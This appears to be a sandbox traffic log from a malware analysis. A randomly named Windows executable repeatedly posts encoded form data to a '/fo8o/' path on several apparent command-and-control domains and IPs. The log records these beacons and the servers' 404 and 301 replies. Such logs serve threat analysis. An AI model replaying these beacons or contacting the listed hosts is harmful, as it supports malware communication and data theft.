62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49727	195.110.124.133	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:08:30.198471069 CET	799	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 7a 34 33 79 49 4d 31 49 66 4f 5a 37 6d 56 63 63 63 59 38 54 78 48 2b 6d 35 38 45 55 66 48 79 67 4b 62 4b 62 65 45 3d Data Ascii: 7Fp=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCiz43yIM1IfOZ7mVcccY8TxH+m58EUfHygKbKbeE=
Jan 11, 2025 04:08:30.868482113 CET	367	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 03:08:30 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49728	195.110.124.133	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:08:32.729330063 CET	819	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 76 56 6d 36 55 79 52 6f 61 61 36 70 4c 36 46 4a 51 39 75 2f 76 75 6f 36 66 32 62 6f 4c 45 79 6f 71 74 6e 42 52 77 Data Ascii: 7Fp=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxvVm6UyRoaa6pL6FJQ9u/vuo6f2boLEyoqtnBRw
Jan 11, 2025 04:08:33.397459030 CET	367	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 03:08:33 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49729	195.110.124.133	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:08:35.266057014 CET	1836	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4d 51 6d 4b 43 66 2f 2f 71 30 52 61 49 71 70 39 59 76 73 4b 61 30 53 35 6f 2f 44 76 4a 37 39 53 36 53 68 7a 75 48 2b 33 33 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 50 32 53 7a 58 78 48 58 52 70 75 69 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 70 75 [TRUNCATED] Data Ascii: 7Fp=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWMQmKCf//q0RaIqp9YvsKa0S5o/DvJ79S6ShzuH+33Z5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EP2SzXxHXRpuiCufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adEqPPSb596q02+bm10h/KbfXTSTOac3EfjuVQou72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQYK911v/jw+PvZPYENr7STg8l0F3Ck6zV/xq1Dwgu7JJlRF+hAwxxua7LvS1AAdhBU1HBZstoRWAHyLbMWL7UzFXXPMllHfqBBFn5xU9fUOjVkD57bXun2hTR7+B3omt0GagFXgV9C43jnm0Z75arUxuHyRsw6jHloDTJUUv0x+RGZxA480KZmNeLnxJB7gRXwcZ3ObkUZdNYgtX5mu2bWtzVzhWkv2jaEmpvKYj0gX7vQpGNVz/jEIunuuC6hWo22PkhTxBptpyk2r6lwkrb0tv/hbsCsaLWX8fcmD0/i2PSXddJXQXobz8OjWYV1zT2iFUUVP+K2/IwOhEvlyoIgIyNGb0whqhjDeOTaEXJBhlHkm0Yj/QkU2pCt2+M6VQZbaqGTZVZtW2Vxfea1e7rOEmm6W9YBDB4eNzgJyODVo31o39GOR9pYERPj2lU9+KQZYN/z3B9UKWVkNYMP65mslzl+IzchTJVhnfM5gRIQiAIx8v3ZDE1gAlKesA0ev8l+bFsiA1fwCJUSEcJs [TRUNCATED]
Jan 11, 2025 04:08:36.040844917 CET	367	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 03:08:35 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49730	195.110.124.133	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:08:37.792973995 CET	523	OUT	GET /fo8o/?7Fp=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ==&HN4=EPU0u4nHA HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.elettrosistemista.zip Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 11, 2025 04:08:38.475059986 CET	367	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 03:08:38 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	49731	217.196.55.202	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:08:59.690491915 CET	787	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 74 34 45 67 75 6d 30 31 36 50 44 43 47 38 4e 50 79 48 57 47 68 68 34 36 44 79 31 5a 4b 71 52 6a 37 71 63 30 57 30 3d Data Ascii: 7Fp=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Jut4Egum016PDCG8NPyHWGhh46Dy1ZKqRj7qc0W0=
Jan 11, 2025 04:09:00.280297995 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Sat, 11 Jan 2025 03:09:00 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	49732	217.196.55.202	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:09:02.267472029 CET	807	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 4a 54 36 41 61 44 63 39 33 35 35 59 36 73 71 42 6a 43 79 51 72 49 41 63 6b 58 5a 30 54 72 6a 6c 56 48 6b 36 30 65 Data Ascii: 7Fp=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhJT6AaDc9355Y6sqBjCyQrIAckXZ0TrjlVHk60e
Jan 11, 2025 04:09:02.845009089 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Sat, 11 Jan 2025 03:09:02 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	49733	217.196.55.202	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:09:04.862430096 CET	1824	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 79 66 57 61 6e 4e 6e 38 58 44 6b 54 76 7a 64 2f 49 65 32 6e 42 36 74 7a 51 4c 57 4b 61 6b 72 64 47 47 34 78 55 73 63 72 4b 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 31 4f 5a 6e 37 68 75 36 4b 34 66 4a 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 56 38 [TRUNCATED] Data Ascii: 